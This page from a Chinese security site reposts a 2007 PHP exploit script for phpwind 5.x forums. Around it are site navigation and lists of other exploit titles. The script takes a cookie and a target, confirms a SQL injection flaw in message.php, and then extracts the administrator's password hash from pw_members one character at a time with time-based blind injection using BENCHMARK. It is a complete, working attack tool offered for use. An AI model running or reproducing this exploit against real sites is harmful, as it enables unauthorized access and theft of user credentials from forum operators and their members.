首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
phpwind 5.x exploits
来源:www.vfocus.net 作者:Loveshell 发布时间:2007-04-09  

<?php
print_r("

+------------------------------------------------------------------+

Exploit For Phpwind 5.X Version
BY  Loveshell
Just For Fun :)

+------------------------------------------------------------------+
");


ini_set("max_execution_time",0);
error_reporting(7);

$bbspath="$argv[2]";
$server="$argv[1]";
$cookie='1ae40_lastfid=0; 1ae40_ol_offset=776; 1ae40_ck_info=%2F
%09.72m.net;
1ae40_winduser=A1QKBgE9UFxUUwAHDloFUAMIAFxeUgIMWgFUVVYDAA8HBFQNUVA%3D;
1ae40_lastvisit=0%091173612527%09%2Fbbs%2Findex.php%3F;
$useragent="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)";
$uid=intval($argv[3])>0 ? intval($argv[3]):1;

echo "\r\n#Logging\t........";
if(islogin()) echo "Login Ok!\r\n";
else die("Not Login!\tCheck Your Cookie and Useragent!\r\n");


echo "#Testing\t........";
if(test()) echo "Vul!\r\n";
else die("Not Vul");


$hashtable='0123456789abcdef';
$count=0;

echo "#Cracking\t\r\n\r\n";

for($i=1;$i<=16;$i++){
 echo "第\t$i\t位:";
 $subpass=crack($i+8);
 $password=$password.$subpass;
 echo "$subpass\r\n";
}

echo "Password:\t$password";

echo "\r\nGood Luck $count Times\r\n";


function send($cmd,$path)
{
  global $bbspath,$server,$cookie,$count,$useragent,$debug,$evilip;

  $path=$bbspath."$path";
  $message = "POST ".$path." HTTP/1.1\r\n";
  $message .= "Accept: */*\r\n";
  $message .= "Accept-Language: zh-cn\r\n";
  $message .= "Referer: http://".$server.$path."\r\n";
  $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
  $message .= "User-Agent: ".$useragent."\r\n";
  $message .= "Host: ".$server."\r\n";
  $message .= "Content-length: ".strlen($cmd)."\r\n";
  $message .= "Connection: Keep-Alive\r\n";
  $message .= "Cookie: ".$cookie."\r\n";
  $message .= "\r\n";
  $message .= $cmd."\r\n";

  $count=$count+1;
  $fd = fsockopen( $server, 80 );
  fputs($fd,$message);
  $resp = "<pre>";
  while($fd&&!feof($fd)) {
  $resp .= fread($fd,1024);
  }
  fclose($fd);
  $resp .="</pre>";
  if($debug) {echo $cmd;echo $resp;}
//  echo $resp;
  return $resp;
}


function sqlject($sql){
 global $uid;
 $data='action=pubmsg&readmsg=0)';
 $data=$data." union select BENCHMARK(1000000,md5(12345)) from
pw_members where uid=$uid and $sql".'/*';
 $echo=send($data,'message.php');
 preg_match("/Total (.*)\(/i",$echo,$matches);
 if($matches[1]>2) return 1;
 else return 0;
}

function test(){
 global $uid;
 $data='action=pubmsg&readmsg=0)';
 $echo=send($data,'message.php');
 if(strpos($echo,'MySQL Server Error')) return 1;
 else return 0;
}

function islogin(){
 global $uid;
 $data='action=pubmsg&readmsg=0)';
 $echo=send($data,'message.php');
 if(strpos($echo,'login.php"')) return 0;
 else return 1;
}

function crack($i){
global $hashtable;

$sql="mid(password,$i,1)>0x".bin2hex('8');
if(sqlject($sql)){
 $a=8;
 $b=15;}
else {
 $a=0;
 $b=8;
}


for($tmp=$a;$tmp<=$b;$tmp++){
 $sql="mid(password,$i,1)=0x".bin2hex($hashtable[$tmp]);
 if(sqlject($sql)) return $hashtable[$tmp];
}
crack($i);
}
?>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MS Windows Explorer Unspecifie
·phpwind5.x passport_client.php
·Wserve HTTP Server 4.6 (Long D
·MS Windows GDI Local Privilege
·phpMyNewsletter <= 0.8 (beta5)
·Apache Mod_Rewrite Off-by-one
·Mutant 0.9.2 mutant_functions.
·AOL SuperBuddy ActiveX Control
·IrfanView 3.99 .ANI File Local
·HP Mercury Quality Center Spid
·MS Windows Animated Cursor (.A
·CyBoards PHP Lite 1.21 (script
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved